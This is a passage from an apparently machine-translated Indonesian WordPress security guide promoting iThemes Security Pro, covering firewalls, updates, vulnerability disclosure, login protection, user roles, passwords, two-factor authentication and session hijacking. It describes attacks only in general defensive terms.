Cloudflare menawarkan sertifikat SSL bersama gratis untuk situs web WordPress. Jika Anda memilih untuk tidak memiliki sertifikat SSL bersama dan Anda merasa nyaman dengan baris perintah, CertBot adalah pilihan yang sangat baik. Certbot tidak hanya membuat sertifikat SSL gratis menggunakan Let's Encrypt untuk Anda, tetapi juga secara otomatis mengelola pembaruan sertifikat untuk Anda.

Mengaktifkan SSL di situs web WordPress Anda adalah suatu keharusan pada tahun 2021. SSL mengamankan komunikasi antara Anda dan pelanggan Anda, meningkatkan SEO Anda, dan memberi pengunjung situs Anda kenyamanan bahwa mereka aman saat menjelajahi situs web Anda.

Gunakan Firewall Aplikasi Web

Menggunakan Firewall Aplikasi Web adalah cara yang bagus untuk menambahkan lapisan perlindungan lain ke situs web WordPress Anda.

Apa itu Firewall Aplikasi Web?

WAF atau Firewall Aplikasi Web membantu mengamankan situs web Anda dengan memantau lalu lintas internet yang menuju ke situs web Anda sebelum mencapai situs web Anda.

Dengan menambahkan WAF di depan WordPress, Anda menambahkan pos pemeriksaan keamanan antara internet dan situs web Anda. Sebelum lalu lintas dapat mengakses situs web Anda, itu harus melewati WAF.

Jika WAF mendeteksi lalu lintas berbahaya seperti CSRF, XSS, SQL Injection, dan banyak lagi-itu akan menyaringnya sebelum menyentuh situs web Anda. Tidak hanya itu, WAF dapat membantu mendeteksi serangan DDoS dan menerapkan pembatasan kecepatan untuk mencegah situs web Anda mogok.

3 Cara Menerapkan WAF

Ada 3 cara berbeda untuk menerapkan WAF. Mari kita lihat pro dan kontra untuk setiap jenis.

1. WAF berbasis jaringan – WAF berbasis jaringan atau fisik berbasis perangkat keras. Pro utama WAF berbasis jaringan adalah latensi rendah yang berasal dari pemasangan secara lokal. Namun, kontra datang dari harga penyimpanan dan pemeliharaan peralatan fisik. Harga dan persyaratan penyimpanan fisik menjadikan ini pilihan yang buruk bagi kebanyakan orang.
2. WAF berbasis host – WAF berbasis host atau lokal terintegrasi ke dalam WordPress, biasanya menggunakan plugin. Kelebihan WAF berbasis host adalah lebih murah daripada WAF berbasis jaringan. Kontra ke WAF lokal adalah persyaratan sumber daya server Anda. Dan dengan pemfilteran lalu lintas yang terjadi di situs web Anda, ini dapat mengakibatkan waktu buka halaman yang lebih lambat bagi pengunjung situs web Anda.
3. WAF berbasis cloud – WAF berbasis cloud biasanya merupakan pilihan terbaik bagi kebanyakan orang. Kelebihan WAF berbasis cloud adalah harganya terjangkau, tidak mengharuskan Anda untuk mengelolanya. Plus, dengan lalu lintas yang disaring sebelum mencapai situs web Anda, itu tidak akan menyedot sumber daya server Anda dan memperlambat situs web Anda. Cloudflare dan Sucuri adalah penyedia firewall berbasis cloud yang populer.

Membungkus

Di bagian ini, kami mempelajari mengapa sangat penting untuk memilih host yang tepat, cara mengamankan komunikasi antara situs web kami dan pengunjungnya, dan bagaimana WAF dapat membantu memblokir lalu lintas berbahaya agar tidak mengenai situs web kami.

Di bagian mendatang, Anda akan mempelajari praktik terbaik untuk menjaga keamanan perangkat lunak WordPress Anda.

Bagian 5: Keamanan Perangkat Lunak WordPress

Setiap kali Anda memasang plugin atau tema baru, Anda memasukkan kode baru yang berpotensi dimanfaatkan oleh peretas. Di bagian ini, Anda akan mempelajari apa yang harus dan tidak boleh dilakukan dalam mengelola WordPress, plugin, dan tema.

1. Hanya Instal Perangkat Lunak dari Sumber Tepercaya

Hanya instal plugin dan tema WordPress dari sumber tepercaya. Anda hanya boleh menginstal perangkat lunak yang Anda dapatkan dari WordPress.org, repositori komersial terkenal, atau langsung dari pengembang terkemuka. Anda akan ingin menghindari versi "nulled" dari plugin komersial karena mereka dapat berisi kode berbahaya. Tidak masalah bagaimana Anda mengunci situs WordPress Anda jika Anda yang menginstal malware.

Jika plugin atau tema WordPress tidak didistribusikan di situs web pengembang, Anda harus melakukan uji tuntas sebelum mengunduh plugin. Jangkau pengembang untuk melihat apakah mereka berafiliasi dengan situs web yang menawarkan produk mereka dengan harga gratis atau diskon.

2. Hapus Plugin dan Tema yang Tidak Digunakan

Memiliki plugin dan tema yang tidak digunakan atau tidak aktif di situs web Anda adalah kesalahan keamanan WordPress utama. Setiap potongan kode di situs web Anda adalah titik masuk potensial bagi peretas.

Ini adalah praktik umum bagi pengembang untuk menggunakan kode pihak ketiga seperti perpustakaan JS-dalam plugin dan tema mereka. Sayangnya, jika perpustakaan tidak dirawat dengan baik, mereka dapat menciptakan kerentanan yang dapat dimanfaatkan penyerang untuk meretas situs web Anda.

Catatan: Gunakan Audit Situs Pro iThemes Sync Pro untuk memeriksa halaman web Anda untuk perpustakaan JavaScript front-end dengan kerentanan keamanan yang diketahui.

Copot pemasangan dan hapus sepenuhnya semua plugin dan tema yang tidak perlu di situs WordPress Anda untuk membatasi jumlah titik akses dan kode yang dapat dieksekusi di situs web Anda.

3. Perbarui Perangkat Lunak WordPress Anda

Menjaga perangkat lunak diperbarui adalah bagian penting dari setiap strategi keamanan WordPress. Pembaruan tidak hanya untuk perbaikan bug dan fitur baru. Pembaruan juga dapat mencakup tambalan keamanan penting. Tanpa tambalan itu, Anda membiarkan ponsel, komputer, server, router, atau situs web Anda rentan terhadap serangan.

Memiliki plugin atau tema rentan yang tambalannya tersedia tetapi tidak diterapkan adalah penyebab nomor satu situs web WordPress yang diretas. Ini berarti bahwa sebagian besar kerentanan dieksploitasi SETELAH patch untuk kerentanan dirilis.

Pelanggaran Equifax yang banyak dilaporkan dapat dicegah jika mereka memperbarui perangkat lunak mereka. Untuk pelanggaran Equifax, tidak ada alasan.

Sesuatu yang sederhana seperti memperbarui perangkat lunak Anda dapat melindungi Anda. Jadi jangan abaikan pembaruan WordPress itu — pembaruan adalah salah satu komponen paling dasar dari keamanan WordPress dan semua keamanan web.

Patch Selasa

Patch Tuesday adalah istilah tidak resmi untuk merujuk pada bug reguler dan perbaikan keamanan yang dirilis Microsoft pada hari Selasa kedua setiap bulan. Sungguh fantastis bahwa Microsoft merilis perbaikan keamanan pada irama yang dapat diandalkan. Patch Tuesday juga merupakan hari di mana kerentanan keamanan yang ditambal Microsoft diungkapkan secara publik.

Lihat bagian Apa yang Diperbarui & Cara Mengotomatiskan Pembaruan Anda dari The Ultimate Guide to WordPress Security in 2020 ebook untuk mempelajari cara menerapkan pembaruan Patch Tuesday secara otomatis.

Eksploitasi Rabu

Pada hari Rabu setelah Patch Tuesday, adalah umum untuk melihat banyak penyerang mengeksploitasi kerentanan yang diketahui sebelumnya pada sistem yang sudah ketinggalan zaman dan belum ditambal. Jadi, hari Rabu setelah Patch Tuesday secara tidak resmi diciptakan sebagai Exploit Wednesday.

Mengapa Peretas Menargetkan Kerentanan yang Ditambal?

Peretas menargetkan kerentanan yang ditambal karena mereka tahu orang tidak memperbarui (termasuk plugin dan tema di situs web Anda). Merupakan standar industri untuk mengungkapkan kerentanan secara publik pada hari kerentanan tersebut ditambal. Setelah kerentanan diungkapkan kepada publik, kerentanan menjadi "kerentanan yang diketahui" untuk versi perangkat lunak yang sudah ketinggalan zaman dan belum ditambal. Perangkat lunak dengan kerentanan yang diketahui adalah sasaran empuk bagi peretas.

Peretas menyukai sasaran empuk, dan memiliki perangkat lunak dengan kerentanan yang diketahui seperti memberikan petunjuk langkah demi langkah kepada peretas untuk membobol situs web WordPress, server, komputer, atau perangkat lain yang terhubung ke internet.

Pengungkapan yang Bertanggung Jawab

Anda mungkin bertanya-tanya mengapa kerentanan akan diungkapkan jika itu memberi peretas eksploitasi untuk menyerang. Yah, sangat umum bagi peneliti keamanan untuk menemukan dan secara pribadi melaporkan kerentanan kepada pengembang perangkat lunak.

Dengan pengungkapan yang bertanggung jawab, laporan awal peneliti dibuat secara pribadi kepada pengembang perusahaan yang memiliki perangkat lunak, tetapi dengan kesepakatan bahwa rincian lengkap akan dipublikasikan setelah patch tersedia. Untuk kerentanan keamanan yang signifikan, mungkin ada sedikit keterlambatan dalam mengungkapkan kerentanan untuk memberi lebih banyak waktu bagi orang untuk menambal.

Peneliti keamanan dapat memberikan tenggat waktu bagi pengembang perangkat lunak untuk menanggapi laporan atau memberikan tambalan. Jika tenggat waktu ini tidak terpenuhi, maka peneliti dapat mengungkapkan kerentanan secara terbuka untuk memberi tekanan pada pengembang untuk mengeluarkan tambalan.

Mengungkapkan kerentanan secara publik dan tampaknya memperkenalkan Zero Day – jenis kerentanan yang tidak memiliki patch dan sedang dieksploitasi di alam liar – mungkin tampak kontraproduktif. Tapi, itu adalah satu-satunya pengaruh yang dimiliki peneliti untuk menekan pengembang untuk menambal kerentanan.

Jika seorang peretas menemukan kerentanan, mereka dapat diam-diam menggunakan Eksploitasi dan menyebabkan kerusakan pada pengguna akhir (ini adalah Anda), sementara pengembang perangkat lunak tetap puas dengan membiarkan kerentanan tidak ditambal.

Project Zero Google memiliki pedoman serupa dalam hal mengungkapkan kerentanan. Mereka mempublikasikan rincian lengkap kerentanan setelah 90 hari apakah kerentanan telah ditambal atau tidak.

Belajar Memperbarui: Cara yang Sulit

Pada akhir 2018, peretas secara aktif memanfaatkan eksploitasi di plugin Kepatuhan WP GDPR. Eksploitasi memungkinkan pengguna yang tidak sah — orang yang tidak masuk ke situs web — untuk mengubah pengaturan pendaftaran pengguna WP dan mengubah peran pengguna baru default dari pelanggan menjadi administrator. Untungnya, pengembang plugin Kepatuhan WP GDPR bertindak cepat dan merilis tambalan untuk kerentanan sehari setelah diungkapkan secara publik.

Namun, seperti halnya Exploit Wednesday, peretas menargetkan kerentanan meskipun patch telah dirilis. Dalam beberapa hari dan minggu setelah pengungkapan kerentanan Kepatuhan WP GDPR, kami menerima banyak laporan bahwa situs web WordPress diretas oleh penyerang yang mengeksploitasi kerentanan.

Memiliki plugin atau tema rentan yang tambalannya tersedia tetapi tidak diterapkan adalah penyebab nomor satu situs web WordPress yang diretas. INI SANGAT FRUSTRASI!!!!! Ini berarti bahwa sebagian besar peretasan WP dapat dicegah.

Sangat menyedihkan untuk memikirkan semua orang yang menghabiskan banyak uang untuk membersihkan situs web mereka, pendapatan yang hilang saat situs mereka tidak aktif, dan pendapatan masa depan yang hilang karena kehilangan kepercayaan pelanggan mereka. Itu membuatnya semakin menjengkelkan ketika Anda tahu semua penderitaan itu bisa dicegah dengan pembaruan sederhana.

Fitur iThemes Security Pro Version Management membuatnya untuk menyesuaikan dan mengotomatiskan pembaruan WordPress Anda.

4. Melacak Kerentanan WordPress

Menjaga plugin dan tema Anda diperbarui tidak akan melindungi Anda dari setiap kerentanan WordPress. Beberapa plugin dan tema WordPress telah ditinggalkan oleh pengembang yang membuatnya.

Sayangnya, jika plugin atau tema yang ditinggalkan memiliki kerentanan, itu tidak akan pernah mendapatkan tambalan. Peretas akan menargetkan situs web yang menggunakan plugin yang sekarang rentan secara permanen ini.

Jika Anda memiliki plugin yang ditinggalkan dengan kerentanan yang diketahui di situs web Anda, Anda memberi peretas cetak biru yang mereka butuhkan untuk mengambil alih situs web Anda. Itulah mengapa Anda harus melacak semua kerentanan terbaru.

Sulit untuk melacak setiap kerentanan WordPress yang diungkapkan dan membandingkan daftar itu dengan versi plugin dan tema yang telah Anda instal di situs web Anda. Melacak kerentanan adalah perbedaan antara memiliki situs web yang aman versus situs web yang mudah dieksploitasi oleh peretas.

Kabar baik untuk Anda! Kami melacak dan membagikan setiap kerentanan yang diungkapkan di Roundup Kerentanan WordPress kami.

5. Pindai Situs Web Anda Untuk Melihat Kerentanannya

Cara yang lebih cepat untuk melindungi situs web Anda dari eksploitasi peretas yang mudah adalah dengan menggunakan pemindaian otomatis untuk memeriksa situs web Anda dari kerentanan yang diketahui.

iThemes Security Pro Site Scanner adalah cara Anda untuk mengotomatiskan perlindungan kerentanan di semua situs web WordPress Anda. Pemindai Situs memeriksa kerentanan yang diketahui di situs Anda dan akan secara otomatis menerapkan tambalan jika tersedia.

Situs Pro Keamanan iThemes memeriksa 3 jenis kerentanan.

1. Kerentanan WordPress
2. Kerentanan Plugin
3. Kerentanan Tema

Fitur Audit Situs iThemes Sync Pro memanfaatkan kekuatan Google Lighthouse untuk melindungi situs web Anda. Audit Situs memeriksa dan menandai halaman yang menyertakan pustaka JavaScript front-end dengan kerentanan keamanan yang diketahui.

Ini adalah praktik umum bagi pengembang untuk menggunakan kode pihak ketiga seperti perpustakaan JS-dalam plugin dan tema mereka. Sayangnya, jika perpustakaan tidak dirawat dengan baik, mereka dapat menciptakan kerentanan yang dapat dimanfaatkan penyerang untuk meretas situs web Anda. Menggunakan Komponen dengan Kerentanan yang Diketahui ada di daftar 10 Teratas OWASP.

Audit Situs menyelamatkan daging saya! Saya membuat Jadwal Audit agar Sync Pro melakukan audit otomatis mingguan dan mengirimkan email laporan audit kepada saya. Saya terus memperbarui semuanya , dan itulah sebabnya saya terkejut ketika saya melihat di salah satu audit situs web saya bahwa saya menggunakan perpustakaan JavaScript dengan kerentanan keamanan yang diketahui.

Laporan itu mengarahkan saya ke versi jQuery yang sudah ketinggalan zaman di direktori WordPress situs web yang dipenuhi dengan kerentanan yang diketahui! Beruntung bagi saya, saya melihat di Sync Pro Site Audit saya bahwa saya menggunakan perpustakaan JavaScript dengan kerentanan keamanan yang diketahui dan dapat menyelesaikan masalah sebelum situs web saya diretas.

Membungkus

Mengelola perangkat lunak yang membuat situs web Anda berjalan dengan benar, termasuk plugin WordPress, tema, dan inti WordPress Anda, akan sangat membantu dalam strategi keamanan WordPress Anda, mengamankan situs web Anda dari penyerang online.

Bagian 6: Mengamankan Login WordPress Anda

URL login WordPress sama untuk setiap situs WordPress, dan tidak memerlukan izin khusus untuk mengakses. Siapa pun yang memiliki pengalaman bekerja dengan WordPress tahu bahwa URL login terletak di halaman /wp-login.php .

Aksesibilitas halaman login WordPress menjadikannya bagian yang paling diserang—dan berpotensi paling rentan—dari situs WordPress mana pun. Beruntung bagi kami, plugin iThemes Security Pro memudahkan untuk mengamankan login WordPress Anda.

Mari kita lihat alat di iThemes Security Pro yang dapat Anda gunakan untuk mengamankan login WordPress Anda dan membuatnya hampir tidak bisa ditembus!

1. Batasi Upaya Masuk

Langkah pertama untuk mengamankan login WordPress Anda adalah membatasi upaya login yang gagal. Secara default, tidak ada sesuatu yang dibangun ke dalam WordPress untuk membatasi jumlah upaya login yang gagal yang dapat dilakukan seseorang. Tanpa batasan jumlah upaya login yang gagal yang dapat dilakukan penyerang, mereka dapat terus mencoba kombinasi nama pengguna dan kata sandi yang berbeda sampai mereka menemukan yang berhasil.

Fitur iThemes Security Pro Local Brute Force Protection melacak upaya login yang tidak valid yang dilakukan oleh host atau alamat IP dan nama pengguna. Setelah IP atau nama pengguna melakukan terlalu banyak upaya masuk yang tidak valid berturut-turut, mereka akan dikunci dan akan dicegah untuk mencoba lagi untuk jangka waktu tertentu.

Untuk mulai menggunakan fitur Perlindungan Brute Force Lokal , aktifkan di halaman utama halaman pengaturan iThemes Security Pro.

Pengaturan Perlindungan Brute Force Lokal memungkinkan Anda untuk mengatur ambang batas untuk penguncian.

• Upaya Login Maks Per Host – Jumlah upaya login yang tidak valid yang diizinkan oleh IP sebelum terkunci.
• Upaya Login Maks Per Pengguna – Ini adalah jumlah upaya login yang tidak valid yang diizinkan oleh nama pengguna sebelum terkunci.
• Menit untuk Mengingat Login yang Buruk – Ini adalah berapa lama upaya login yang tidak valid harus dihitung terhadap IP atau nama pengguna untuk penguncian.
• Secara otomatis melarang pengguna “admin” – Saat diaktifkan, siapa pun yang menggunakan nama pengguna Admin saat masuk akan menerima penguncian otomatis.

Ada beberapa hal yang ingin Anda ingat saat mengonfigurasi pengaturan penguncian. Anda ingin memberikan upaya login yang tidak valid kepada pengguna daripada yang Anda berikan IP. Katakanlah situs web Anda berada di bawah serangan brute force dan penyerang menggunakan nama pengguna Anda. Tujuannya adalah untuk mengunci IP penyerang dan bukan nama pengguna Anda, sehingga Anda masih dapat masuk dan menyelesaikan pekerjaan, bahkan saat situs web Anda diserang.

Anda juga tidak ingin membuat pengaturan ini terlalu ketat dengan menyetel jumlah upaya login yang tidak valid terlalu rendah dan waktu untuk mengingat upaya yang tidak valid terlalu lama. Jika Anda menurunkan jumlah upaya login yang tidak valid untuk host/IP menjadi 1 dan mengatur menit untuk mengingat upaya login yang buruk menjadi satu bulan, Anda secara drastis meningkatkan kemungkinan secara tidak sengaja mengunci pengguna yang sah.

2. Batasi Upaya Otentikasi Luar Per Permintaan

Ada cara lain untuk login ke WordPress selain menggunakan form login. Menggunakan XML-RPC, penyerang dapat membuat ratusan upaya nama pengguna dan kata sandi dalam satu permintaan HTTP. Metode amplifikasi brute force memungkinkan penyerang melakukan ribuan upaya nama pengguna dan kata sandi menggunakan XML-RPC hanya dalam beberapa permintaan HTTP.

Menggunakan pengaturan WordPress Tweaks iThemes Security Pro, Anda dapat memblokir beberapa upaya otentikasi per permintaan XML-RPC. Membatasi jumlah upaya nama pengguna dan kata sandi menjadi satu untuk setiap permintaan akan sangat membantu mengamankan login WordPress Anda.

3. Perlindungan Brute Force Jaringan

Membatasi upaya login adalah tentang perlindungan brute force lokal. Perlindungan brute force lokal hanya terlihat pada upaya untuk mengakses situs Anda dan melarang pengguna sesuai aturan penguncian yang ditentukan dalam pengaturan keamanan Anda.

Perlindungan Jaringan Brute Force membawa ini selangkah lebih maju. Jaringannya adalah komunitas Keamanan iThemes dan memiliki lebih dari satu juta situs web yang kuat. Jika IP diidentifikasi mencoba masuk ke situs web di komunitas Keamanan iThemes, IP akan ditambahkan ke daftar larangan Jaringan Bruce Force.

Setelah IP ada dalam daftar larangan Network Brute Force, IP akan diblokir di semua situs web di jaringan. Jadi, jika IP menyerang situs web saya dan diblokir, itu akan dilaporkan ke iThemes Security Brute Force Network. Laporan saya dapat membantu agar IP dilarang di seluruh jaringan. Saya senang bahwa saya dapat membantu mengamankan login WordPress orang lain hanya dengan mengaktifkan Perlindungan Jaringan Keamanan iThemes.

Untuk mulai menggunakan Network Force Protection , aktifkan di halaman utama pengaturan keamanan.

Kemudian masukkan alamat email Anda, pilih apakah Anda ingin menerima pembaruan email atau tidak, lalu klik tombol Simpan .

4. Batasi Akses Perangkat ke Dasbor WP

Langkah terakhir untuk mengamankan login WordPress Anda adalah membatasi akses ke dasbor WordPress Anda ke satu set perangkat. Fitur iThemes Security Pro Trusted Devices mengidentifikasi perangkat yang Anda dan pengguna lain gunakan untuk masuk ke situs WordPress Anda. Saat pengguna telah masuk ke perangkat yang tidak dikenal, Perangkat Tepercaya dapat membatasi kemampuan tingkat administrator mereka. Ini berarti bahwa seorang peretas dapat melewati metode keamanan masuk Anda yang lain–sangat tidak mungkin– mereka tidak akan memiliki kemampuan untuk membuat perubahan berbahaya apa pun pada situs web Anda.

Untuk mulai menggunakan Perangkat Tepercaya , aktifkan di halaman utama pengaturan keamanan, lalu klik tombol Konfigurasi Pengaturan .

Dalam pengaturan Perangkat Tepercaya, putuskan pengguna mana yang ingin Anda gunakan fiturnya, lalu aktifkan fitur Batasi Kemampuan dan Perlindungan Pembajakan Sesi .

Setelah mengaktifkan pengaturan Perangkat Tepercaya yang baru, pengguna akan menerima pemberitahuan di bilah admin WordPress tentang perangkat yang tidak dikenal yang tertunda. Jika perangkat Anda saat ini belum ditambahkan ke daftar perangkat tepercaya, klik tautan Konfirmasi Perangkat Ini untuk mengirim email otorisasi .

Klik tombol Konfirmasi Perangkat di email Login Tidak Dikenal untuk menambahkan perangkat Anda saat ini ke daftar Perangkat Tepercaya.

Membungkus

Aksesibilitas halaman login WordPress menjadikannya bagian yang paling diserang—dan berpotensi rentan—dari situs WordPress mana pun. Namun, menggunakan langkah-langkah di bagian ini akan membuat login WordPress Anda hampir tidak bisa ditembus.

Bagian 7: Mengamankan Pengguna WordPress Anda

Setiap kali kita berbicara tentang keamanan pengguna, kita sering mendengar pertanyaan seperti, haruskah setiap pengguna WordPress memiliki persyaratan keamanan yang sama, dan seberapa banyak keamanan yang terlalu banyak keamanan?

Jangan khawatir. Kami menjawab semua pertanyaan ini. Tapi pertama-tama, mari kita bicara tentang berbagai jenis pengguna WordPress.

Apa saja jenis pengguna WordPress yang berbeda?

Ada 5 pengguna WordPress default yang berbeda.

1. Administrator
2. Editor
3. Pengarang
4. Penyumbang
5. pelanggan

Setiap pengguna memiliki kemampuan yang berbeda. Kemampuan menentukan apa yang dapat mereka lakukan setelah mereka mengakses dasbor. Baca lebih lanjut tentang peran dan izin pengguna WordPress.

Potensi Kerusakan dari Berbagai Pengguna WordPress yang Diretas

Sebelum kita dapat memahami cara mengamankan pengguna WordPress kita, kita harus terlebih dahulu memahami tingkat ancaman dari setiap jenis pengguna yang disusupi. Jenis dan tingkat kerusakan yang dapat ditimbulkan oleh penyerang sangat bervariasi tergantung pada peran dan kemampuan pengguna yang mereka retas.

Administrator – Tingkat Ancaman Tinggi

Pengguna administrator memiliki kemampuan untuk apa pun yang mereka inginkan.

• Buat, hapus, dan ubah pengguna.
• Instal, hapus, dan edit plugin dan tema.
• Buat, hapus, dan edit semua posting dan halaman.
• Publikasikan dan batalkan publikasi posting dan halaman.
• Tambahkan dan hapus media.

Jika seorang peretas bisa mendapatkan salah satu Administrator situs Anda, mereka dapat menahan situs web Anda untuk mendapatkan uang tebusan. Seperti yang kami sebutkan sebelumnya, Ransomware mengacu pada saat peretas mengambil alih situs web Anda dan tidak akan melepaskannya kembali kepada Anda kecuali Anda membayar mereka dengan biaya yang besar.

Editor – Tingkat Ancaman Tinggi

Editor mengelola semua konten situs web. Pengguna ini masih memiliki sedikit kekuatan.

• Buat, hapus, dan edit semua posting dan halaman.
• Publikasikan dan batalkan publikasi semua posting dan halaman.
• Unggah file media.
• Kelola semua tautan.
• Kelola komentar.
• Kelola kategori.

Jika penyerang mengambil alih akun Editor, mereka dapat memodifikasi salah satu halaman Anda untuk digunakan dalam serangan phishing. Phishing adalah jenis serangan yang digunakan untuk mencuri data pengguna, termasuk kredensial login dan nomor kartu kredit.

Phishing adalah salah satu cara paling pasti untuk membuat situs web Anda masuk daftar hitam oleh Google. Setiap hari, 10.000 situs masuk daftar blokir Google karena berbagai alasan.

Penulis – Tingkat Ancaman Sedang

Penulis dirancang untuk membuat dan mengelola konten mereka sendiri.

• Buat, hapus, dan edit postingan dan halaman mereka sendiri.
• Publikasikan dan batalkan publikasi posting mereka sendiri.
• Unggah file media

Jika penyerang mendapatkan kendali atas akun Penulis, mereka dapat membuat halaman dan postingan yang mengarahkan pengunjung situs Anda ke situs web berbahaya.

Kontributor & Pelanggan – Tingkat Ancaman Rendah

Kontributor adalah versi ringan dari peran pengguna Penulis. Mereka tidak memiliki kekuatan penerbitan.

• Buat dan edit postingan mereka sendiri.
• Hapus posting mereka sendiri yang tidak dipublikasikan.

Pelanggan dapat membaca hal-hal yang dipublikasikan oleh pengguna lain.

Meskipun peretas dengan peran Kontributor atau Pelanggan tidak dapat membuat perubahan berbahaya, mereka dapat mencuri informasi sensitif apa pun yang disimpan di akun atau halaman profil pengguna.

6 Tips untuk Mengamankan Pengguna WordPress Anda

Oke, itulah beberapa hal buruk yang dapat dilakukan peretas terhadap situs web kita. Kabar baiknya adalah bahwa sebagian besar serangan pada akun pengguna WordPress Anda dapat dicegah hanya dengan sedikit usaha dari pihak Anda.

Mari kita lihat hal-hal yang dapat Anda lakukan untuk mengamankan pengguna WordPress Anda. Yang benar adalah bahwa metode keamanan WordPress ini akan membantu mengamankan setiap jenis pengguna WordPress. Namun, saat kami membahas masing-masing metode, kami akan memberi tahu Anda pengguna mana yang harus Anda perlukan untuk menggunakan metode tersebut.

1. Hanya Beri Orang Kemampuan yang Mereka Butuhkan

Cara termudah untuk melindungi situs web Anda adalah dengan hanya memberi pengguna Anda kemampuan yang mereka butuhkan dan tidak lebih. Jika satu-satunya hal yang akan dilakukan seseorang di situs web Anda adalah membuat dan mengedit posting blog mereka sendiri, mereka tidak memerlukan kemampuan untuk mengedit posting orang lain.

2. Amankan Pengguna WordPress dengan Kata Sandi yang Kuat

Dalam daftar yang disusun oleh Splash Data, kata sandi paling umum yang disertakan dalam semua dump data adalah 123456. Dump data adalah database yang diretas yang diisi dengan kata sandi pengguna yang dibuang di suatu tempat di internet. Bisakah Anda bayangkan berapa banyak orang di situs web Anda yang menggunakan kata sandi yang lemah jika 123456 adalah kata sandi yang paling umum di dump data?

Menggunakan kata sandi yang lemah seperti mencoba mengunci pintu depan Anda dengan selotip. Tidak pernah butuh waktu lama bagi peretas untuk memaksa melewati kata sandi yang lemah ke dalam situs web. Sekarang peretas memanfaatkan kartu grafis komputer dalam serangan mereka, waktu yang diperlukan untuk memecahkan kata sandi tidak pernah lebih rendah.

Misalnya, mari kita lihat bagan yang dibuat oleh Terahash, perusahaan pembobol kata sandi berkinerja tinggi. Bagan mereka menunjukkan waktu yang diperlukan untuk memecahkan kata sandi menggunakan cluster hashstack 448x RTX 2080-an.

Secara default, WordPress menggunakan MD5 untuk meng-hash kata sandi pengguna yang disimpan di database WP. Jadi, menurut bagan ini, Terahash dapat memecahkan kata sandi 8 karakter … hampir seketika. Itu tidak hanya sangat mengesankan tetapi juga sangat menakutkan. Kabar baiknya adalah kami dapat mengamankan login WordPress kami dengan mengharuskan pengguna tingkat tinggi kami menggunakan kata sandi yang kuat.

Fitur Persyaratan Kata Sandi Pro Keamanan iThemes memungkinkan Anda memaksa pengguna tertentu untuk menggunakan kata sandi yang kuat. Aktifkan fitur Persyaratan Kata Sandi di halaman utama pengaturan keamanan, lalu pilih pengguna yang ingin Anda perlukan untuk menggunakan kata sandi yang kuat.

3. Menolak Kata Sandi yang Disusupi

Menurut Laporan Investigasi Pelanggaran Data Verizon, lebih dari 70% karyawan menggunakan kembali kata sandi di tempat kerja. Tetapi statistik terpenting dari laporan tersebut adalah bahwa 81% pelanggaran terkait peretasan memanfaatkan kata sandi yang dicuri atau lemah.

Hacker menggunakan bentuk serangan brute force yang disebut serangan kamus. Serangan kamus adalah metode membobol situs web WordPress dengan kata sandi yang umum digunakan yang muncul di dump basis data. "Koleksi #1? Pelanggaran Data yang dihosting di MEGA mencakup 1.160.253.228 kombinasi unik alamat email dan kata sandi. Itu adalah satu miliar dengan b. Skor semacam itu akan sangat membantu serangan kamus mempersempit kata sandi WordPress yang paling umum digunakan.

Ini adalah suatu keharusan untuk mencegah pengguna dengan kemampuan tingkat Penulis dan di atas menggunakan kata sandi yang disusupi untuk mengamankan login WordPress Anda. Anda mungkin juga berpikir untuk tidak membiarkan pengguna tingkat bawah Anda menggunakan kata sandi yang disusupi.

Sangat dapat dimengerti dan didorong untuk membuat akun pelanggan baru semudah mungkin. Namun, pelanggan Anda mungkin tidak tahu bahwa kata sandi yang mereka gunakan telah ditemukan di dump data. Anda akan memberikan layanan yang luar biasa kepada pelanggan Anda dengan memberi tahu mereka bahwa kata sandi yang mereka gunakan telah disusupi. Jika mereka menggunakan kata sandi itu di mana-mana, Anda dapat menyelamatkan mereka dari beberapa sakit kepala besar di jalan.

Fitur iThemes Security Pro Refuse Compromised Passwords memaksa pengguna untuk menggunakan kata sandi yang tidak muncul dalam pelanggaran kata sandi yang dilacak oleh Have I Been Pwned. Aktifkan fitur Persyaratan Kata Sandi di halaman utama pengaturan keamanan, lalu pilih pengguna yang ingin Anda cegah menggunakan kata sandi yang disusupi.

4. Amankan Pengguna WordPress dengan Otentikasi Dua Faktor

Menggunakan otentikasi dua faktor adalah hal terbaik yang dapat Anda lakukan untuk mengamankan login WordPress Anda. Otentikasi dua faktor adalah proses verifikasi identitas seseorang dengan memerlukan dua metode verifikasi yang terpisah. Google membagikan di blognya bahwa menggunakan otentikasi dua faktor dapat menghentikan 100% serangan bot otomatis. Saya sangat menyukai peluang itu.

Fitur iThemes Security Pro Two-Factor Authentication memberikan banyak fleksibilitas saat menerapkan 2fa di situs web Anda. Anda dapat mengaktifkan dua faktor untuk semua atau beberapa pengguna Anda, dan Anda dapat memaksa pengguna tingkat tinggi Anda untuk menggunakan 2fa pada setiap login.

Untuk kenyamanan Anda, iThemes Security Pro menawarkan 2 metode otentikasi dua faktor yang berbeda.

1. Aplikasi Seluler – Metode aplikasi seluler adalah metode autentikasi dua faktor paling aman yang disediakan oleh iThemes Security Pro. Metode ini mengharuskan Anda menggunakan aplikasi seluler dua faktor gratis seperti Authy.
2. Email – Metode email dua faktor akan mengirimkan kode sensitif waktu ke alamat email pengguna Anda.
3. Kode Cadangan – Satu set kode sekali pakai yang dapat digunakan untuk masuk jika metode dua faktor utama hilang.

5. Amankan Pengguna WordPress dari Pembajakan Sesi

WordPress menghasilkan cookie sesi setiap kali Anda masuk ke situs web Anda. Dan katakanlah Anda memiliki ekstensi browser yang telah ditinggalkan oleh pengembang dan tidak lagi merilis pembaruan keamanan. Sayangnya untuk Anda, ekstensi browser yang diabaikan memiliki kerentanan. Kerentanan memungkinkan aktor jahat untuk membajak cookie browser Anda, termasuk cookie sesi WordPress yang disebutkan sebelumnya. Jenis peretasan ini dikenal sebagai Pembajakan Sesi . Jadi, penyerang dapat mengeksploitasi kerentanan ekstensi untuk mendukung login Anda dan mulai membuat perubahan berbahaya dengan pengguna WordPress Anda.

Anda harus memiliki perlindungan pembajakan sesi untuk Admin dan Editor Anda.

Fitur iThemes Security Pro Trusted Devices membuat Pembajakan Sesi menjadi sesuatu dari masa lalu. Jika perangkat pengguna berubah selama sesi, iThemes Security akan secara otomatis mengeluarkan pengguna untuk mencegah aktivitas tidak sah di akun pengguna, seperti mengubah alamat email pengguna atau mengunggah plugin berbahaya.

6. Buat Pengguna Dukungan Universal

